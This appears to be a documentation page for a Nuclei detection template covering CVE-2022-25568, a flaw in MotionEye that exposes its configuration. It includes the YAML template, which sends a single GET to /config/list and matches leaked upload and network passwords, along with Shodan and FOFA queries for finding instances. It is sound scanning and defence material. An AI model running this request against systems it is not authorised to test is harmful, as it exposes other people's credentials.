MotionEye Config Info Disclosure
ID: CVE-2022-25568
Severity: high
Author: DhiyaneshDK
Tags: cve,cve2022,motioneye,config,motioneye_project
Description
Section titled “Description”MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.
YAML Source
Section titled “YAML Source”id: CVE-2022-25568
info: name: MotionEye Config Info Disclosure author: DhiyaneshDK severity: high description: | MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured. reference: - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/ - https://github.com/ccrisan/motioneye/issues/2292 - https://nvd.nist.gov/vuln/detail/cve-2022-25568 - https://github.com/KayCHENvip/vulnerability-poc - https://github.com/Miraitowa70/POC-Notes classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-25568 cwe-id: CWE-1188 epss-score: 0.01501 epss-percentile: 0.86918 cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: motioneye_project product: motioneye shodan-query: - html:"MotionEye" - http.html:"motioneye" fofa-query: body="motioneye" tags: cve,cve2022,motioneye,config,motioneye_project
http: - method: GET path: - "{{BaseURL}}/config/list"
matchers-condition: and matchers: - type: word part: body words: - "upload_password" - "network_password" condition: and
- type: word part: header words: - "application/json"
- type: status status: - 200# digest: 490a0046304402202a04c9eb75eb5e331d4cc22e1e250a668b9efa47cfcca6c0b870bdbe4c78e12902201b5b0dad963c7bdf1f796d4a086c3b66c79b11f91757bf9eea69e5173793735d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-25568.yaml"